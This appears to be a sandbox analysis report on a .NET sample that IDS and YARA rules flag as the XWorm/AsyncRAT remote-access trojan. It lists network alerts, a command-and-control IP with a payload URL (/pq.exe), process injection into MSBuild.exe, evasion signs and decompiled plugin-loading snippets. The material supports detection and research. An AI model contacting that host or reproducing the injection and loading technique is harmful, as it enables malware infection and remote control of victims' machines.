Source: Network traffic | Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49723 -> 92.255.85.2:4372
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.5:49723 -> 92.255.85.2:4372
Source: Network traffic | Suricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49723 -> 92.255.85.2:4372
Source: Malware configuration extractor | URLs: 92.255.85.2
Source: global traffic | TCP traffic: 192.168.2.5:49723 -> 92.255.85.2:4372
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Content-Type: application/octet-stream | Last-Modified: Sun, 16 Mar 2025 16:42:29 GMT | Accept-Ranges: bytes | ETag: "144d689296db1:0" | Server: Microsoft-IIS/10.0 | Date: Mon, 17 Mar 2025 17:39:13 GMT | Content-Length: 33280
Source: global traffic | HTTP traffic detected: GET /pq.exe HTTP/1.1 | Host: 92.255.85.2 | Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: SOVTEL-ASRU SOVTEL-ASRU
Source: Network traffic | Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49722 -> 92.255.85.2:80
            Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.14
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.2
            Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknown	TCP traffic detected without corresponding DNS query: 72.247.153.162
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364616725.0000000002CD7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.2
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364616725.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.2/pq.exe
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364616725.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.2/pq.exeP
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364616725.0000000002CD7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.3815568317.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
            Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
            Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
            Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
            Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

            System Summary

            Source: dump.pcap, type: PCAP	Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.v4mNsTzbsL.exe.2ceaad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.v4mNsTzbsL.exe.2ceaad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000001.00000002.3814656283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1364616725.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1364616725.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process Stats: CPU usage > 49%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00B76350
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00B784B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00B75678
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00B7AC10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00B75330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00B70BA0
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364616725.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs v4mNsTzbsL.exe
            Source: v4mNsTzbsL.exe, 00000000.00000000.1353424703.0000000000872000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBolerXls.exe2 vs v4mNsTzbsL.exe
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364616725.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs v4mNsTzbsL.exe
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364221402.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs v4mNsTzbsL.exe
            Source: v4mNsTzbsL.exe	Binary or memory string: OriginalFilenameBolerXls.exe2 vs v4mNsTzbsL.exe
            Source: dump.pcap, type: PCAP	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.v4mNsTzbsL.exe.2ceaad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.v4mNsTzbsL.exe.2ceaad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000001.00000002.3814656283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1364616725.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1364616725.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
            Source: v4mNsTzbsL.exe, Config.cs	Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcTVNCdWlsZC5leGU='
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine	Classification label: mal100.troj.evad.winEXE@3/1@0/1
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\v4mNsTzbsL.exe.log
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\bFh8cGGVyBJ2hXxI
            Source: v4mNsTzbsL.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: v4mNsTzbsL.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: v4mNsTzbsL.exe	Virustotal: Detection: 50%
            Source: v4mNsTzbsL.exe	ReversingLabs: Detection: 47%
            Source: unknown	Process created: C:\Users\user\Desktop\v4mNsTzbsL.exe "C:\Users\user\Desktop\v4mNsTzbsL.exe"
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe"
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: version.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Section loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: avicap32.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msvfw32.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winmm.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: v4mNsTzbsL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: v4mNsTzbsL.exe	Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: v4mNsTzbsL.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

            Data Obfuscation

            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Messages.cs	.Net Code: Memory
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.v4mNsTzbsL.exe.2cff474.1.raw.unpack, Messages.cs	.Net Code: Memory
            Source: v4mNsTzbsL.exe	Static PE information: 0xC61F1F27 [Wed May 1 09:25:59 2075 UTC]
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe	Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Memory allocated: ED0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Memory allocated: 2C70000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Memory allocated: 2A70000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Memory allocated: B70000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Memory allocated: 29A0000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Memory allocated: 27A0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Window / User API: threadDelayed 6385
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Window / User API: threadDelayed 3468
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe TID: 8904; Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe TID: 8892; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8980; Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8992; Thread sleep count: 6385 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8992; Thread sleep count: 3468 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File Volume queried: C:\ FullSizeInformation
            Source: v4mNsTzbsL.exe, 00000000.00000002.1364221402.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
            Source: MSBuild.exe, 00000001.00000002.3815168819.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Process token adjusted: Debug
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: v4mNsTzbsL.exe, Nums.cs; Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: v4mNsTzbsL.exe, Nums.cs; Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num2, length, 12288, 64)
            Source: 0.2.v4mNsTzbsL.exe.2ceef48.0.raw.unpack, Messages.cs; Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40A000
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40C000
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 8D5008
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe"
            Source: C:\Users\user\Desktop\v4mNsTzbsL.exe; Queries volume information: C:\Users\user\Desktop\v4mNsTzbsL.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
